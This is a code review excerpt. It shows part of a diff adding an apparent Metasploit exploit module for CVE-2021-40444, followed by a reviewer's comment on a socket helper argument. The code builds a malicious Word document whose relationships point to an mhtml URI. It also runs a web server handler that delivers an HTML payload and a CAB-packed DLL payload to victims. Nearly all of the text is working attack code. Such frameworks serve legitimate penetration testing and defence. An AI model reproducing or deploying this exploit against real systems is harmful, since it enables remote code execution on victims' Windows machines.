modules/exploits/windows/fileformat/word_mshtml_rce.rb

```diff
@@ -0,0 +1,375 @@
+    @docx.each do |entry|
+      case entry[:fname]
+      when 'word/document.xml'
+        entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)
+      when 'word/_rels/document.xml.rels'
+        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "mhtml:#{uri}!x-usc:#{uri}")
+      end
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * '/'
+
+    new_str = new_str.gsub!('//', '/') while new_str.index('//')
+
+    # makes sure there's a starting slash
+    unless new_str[0, 1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def on_request_uri(cli, request)
+    header_cab = {
+      'Access-Control-Allow-Origin' => '*',
+      'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',
+      'Cache-Control' => 'no-store, no-cache, must-revalidate',
+      'Content-Type' => 'application/octet-stream',
+      'Content-Disposition' => "attachment; filename=#{File.basename(@my_resources.first)}.cab"
+    }
+
+    header_html = {
+      'Access-Control-Allow-Origin' => '*',
+      'Access-Control-Allow-Methods' => 'GET, POST',
+      'Cache-Control' => 'no-store, no-cache, must-revalidate',
+      'Content-Type' => 'text/html; charset=UTF-8'
+    }
+
+    if request.method.eql? 'HEAD'
+      if request.raw_uri.to_s.end_with? '.cab'
+        send_response(cli, '', header_cab)
+      else
+        send_response(cli, '', header_html)
+      end
+    elsif request.method.eql? 'OPTIONS'
+      response = create_response(501, 'Unsupported Method')
+      response['Content-Type'] = 'text/html'
+      response.body = ''
+
+      cli.send_response(response)
+    elsif request.raw_uri.to_s.end_with? '.html'
+      print_status('Sending HTML Payload')
+
+      send_response_html(cli, generate_html, header_html)
+    elsif request.raw_uri.to_s.end_with? '.cab'
+      print_status('Sending CAB Payload')
+
+      send_response(cli, create_cab(@dll_payload), header_cab)
+    end
+  end
+
+  def pack_docx
+    @docx.each do |entry|
+      if entry[:data].is_a?(Nokogiri::XML::Document)
+        entry[:data] = entry[:data].to_s
+      end
+    end
+
+    Msf::Util::EXE.to_zip(@docx)
+  end
+
+  def unpack_docx(template_path)
+    document = []
+
+    Zip::File.open(template_path) do |entries|
+      entries.each do |entry|
+        if entry.name.match(/\.xml|\.rels$/i)
+          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
+        elsif entry.file?
+          content = entry.get_input_stream.read
+        end
+
+        vprint_status("Parsing item from template: #{entry.name}")
+
+        document << { fname: entry.name, data: content }
+      end
+    end
+
+    document
+  end
+
+  def primer
+    print_status('CVE-2021-40444: Generate a malicious docx file')
+
+    @proto = (datastore['SSL'] ? 'https' : 'http')
+    if datastore['SRVHOST'] == '0.0.0.0'
+      datastore['SRVHOST'] = Rex::Socket.source_address('1.2.3.4')
```

Comment:
It's not necessary to pass in `1.2.3.4`.  The [function](https://github.com/rapid7/rex-socket/blob/12d51fca46dfa3cdc39ea3de9d8d3d9ae1dc70a6/lib/rex/socket.rb#L594) provides a default public address already.